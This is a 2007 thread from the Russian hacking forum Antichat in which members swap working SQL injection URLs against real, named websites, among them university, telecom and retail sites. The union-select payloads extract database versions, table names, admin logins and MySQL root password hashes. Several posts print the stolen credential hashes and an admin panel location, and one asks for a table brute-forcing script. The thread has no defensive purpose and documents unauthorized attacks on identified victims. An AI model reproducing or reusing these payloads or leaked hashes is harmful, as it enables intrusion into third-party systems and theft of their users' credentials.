ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
28.05.2007, 14:19
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от -=megahertz=-
Поля подобрал
http://www.eepublishers.co.za/view.php?sid=-8036+union+select+null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null/*
помогите вывести user u password
круто ты их подобрал... научи как это делается? 
а если серьезно, с полями ковыряться не охота, но там таблицы с префиксом ee_, например есть таблица ee_users... да и еще следи за кодировкой...
__________________
Карфаген должен быть разрушен...
|
|
|
28.05.2007, 14:07
|
|
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536
Репутация:
932
|
|
.edu кончились...
Код:
http://www.acconcept.ru/news/news.php?id=-124+union+select+1,version(),3,4,5,6,7,8/*
http://romanykultury.info/news/news.php?row=-333+union+select+1,version(),3,4,5/*
http://www.hrd.ru/news.php?act=news_by_id&news_id=-283+union+select+1,2,3,4,version(),6,7/*
http://www.cews.org/cews/news.php?aid=-384+union+select+1,version()/* наводим курсор на кнопочку "1" в правом верхнем углу
|
|
|
|
28.05.2007, 14:36
|
|
Новичок
Регистрация: 28.05.2007
Сообщений: 13
Провел на форуме:
17665
Репутация:
23
|
|
Код:
http://moneyru.com/kat/show.php?tema=-1+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16,17,18/*
С таблицой проблема может есть скрипт который бы брутил таблицы например вводишь http://moneyru.com/kat/show.php?tema=-1+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,1 3,14,15,16,17,18 а скрипт дописывал бы +from+здесь_имена_таблиц/* и подбирал из текстового файла каждую строчку (таблицу) и выводил потом те таблицы в которых нет слова Warning или по другому отсеивание делать, например есть цифра от 1 до 50.
Программа SQL Injection TooL не помогла например ввожу туда http://moneyru.com/kat/show.php?tema=1
пробовал и http://moneyru.com/kat/show.php?tema=-1
ввёл сам кол-во полей (18) и выводимые написал что 11. Потом нажимаю брут таблиц она вывела все таблицы что есть в текстовом файле (.
Может есть нормальный рабочий скрипт чтобы только таблицы перебирал? |
|
|
|
28.05.2007, 14:44
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
Код:
http://www.belt-wrestling.org/ru/fed.php?id=-9999+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12/*
=///
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
28.05.2007, 14:49
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Код:
http://www.magweb.ru/one_news.php?news_id=99999999999999+union+select+1,2,3,4,5,concat(database(),char(58),user(),char(58),version()),7,8,9/*
160 таблиц:
Код:
http://www.magweb.ru/one_news.php?news_id=99999999999999+union+select+1,2,3,4,5,table_name,7,8,9+from+information_schema.tables+limit+160,1/*
----------------------------
phpads_config:
Код:
http://www.magweb.ru/one_news.php?news_id=99999999999999+union+select+1,2,3,4,5,concat(admin,char(58),admin_pw,char(58),admin_fullname,char(58),admin_email,char(58),admin_email_headers,char(58),admin_novice),7,8,9+from+phpads_config/*
phpads - система управления банерами.
root:d8f67c1080703334f221abe74fd4a0f1
А вот самой админки не нашел.
----------------------------
mw_members:
Код:
http://www.magweb.ru/one_news.php?news_id=99999999999999+union+select+1,2,3,4,5,concat(name,char(58),password,char(58),description),7,8,9+from+mw_members+limit+0,1/*
maglord:a5253ca029930561dce315f35e1741fb |
|
|
|
28.05.2007, 14:53
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от Grey
А вот самой админки не нашел.
http://www.magweb.ru/adm/
2Cond...
ты на SQL Injection TooL не гони... если сам не можешь пользовать прогу, а остольные могут, то виноват в этом только ты...
в поле URL введи:
http://moneyru.com/kat/show.php?tema=4
в поле string введи:
Код:
<b>Каталог - Ресурсы Webmoney</b>
и все у тебя найдется и не надо самому там ниче выставлять
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 28.05.2007 в 15:22..
|
|
|
|
28.05.2007, 15:25
|
|
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641
Репутация:
590
|
|
cherkasy.ukrtelecom.ua
Код:
http://www.cherkasy.ukrtelecom.ua/ua/hot_news/?id=-1188+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--
таблицы почемуто не выводятся=\
Код:
http://www.lviv.ukrtelecom.ua/ua/hot_news/?id=-2025+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--
анологично!
|
|
|
|
28.05.2007, 15:39
|
|
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777
Репутация:
2642
|
|
Я понял, в чём прикол..
http://www.law.pitt.edu/feed/rss2.php?blog=research&catid=-28+union+select+1,USER(),3,4,5,6,7,8,9,10,11,12,13 ,14,15/*
http://www.law.pitt.edu/feed/rss2.php?blog=research&catid=-28+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11,12 ,13,14,15/*
http://www.law.pitt.edu/feed/rss2.php?blog=research&catid=-28+union+select+1,DATABASE(),3,4,5,6,7,8,9,10,11,1 2,13,14,15/*
Пароль от ROOT (хеш)
http://www.law.pitt.edu/feed/rss2.php?blog=research&catid=-28+union+select+1,user,password,4,5,6,7,8,9,10,11, 12,13,14,15+from+mysql.user/*
|
|
|
|
28.05.2007, 15:42
|
|
Познающий
Регистрация: 04.05.2007
Сообщений: 38
Провел на форуме:
939769
Репутация:
59
|
|
Магазин радиоуправляемых моделей
http://www.hobbycenter.by/news.php?id=-31+union+select+1,2,3,version(),5,6/*
|
|
|
|
28.05.2007, 15:54
|
|
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777
Репутация:
2642
|
|
http://goliath.cs.ucla.edu/tagger/body.php?urlID=-30996+union+select+USER()/*
http://goliath.cs.ucla.edu/tagger/body.php?urlID=-30996+union+select+VERSION()/*
http://goliath.cs.ucla.edu/tagger/body.php?urlID=-30996+union+select+DATABASE()/*
Пароль от ROOT (хеш)
http://goliath.cs.ucla.edu/tagger/body.php?urlID=-30996+union+select+user+from+mysql.user/*
http://goliath.cs.ucla.edu/tagger/body.php?urlID=-30996+union+select+password+from+mysql.user/*
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид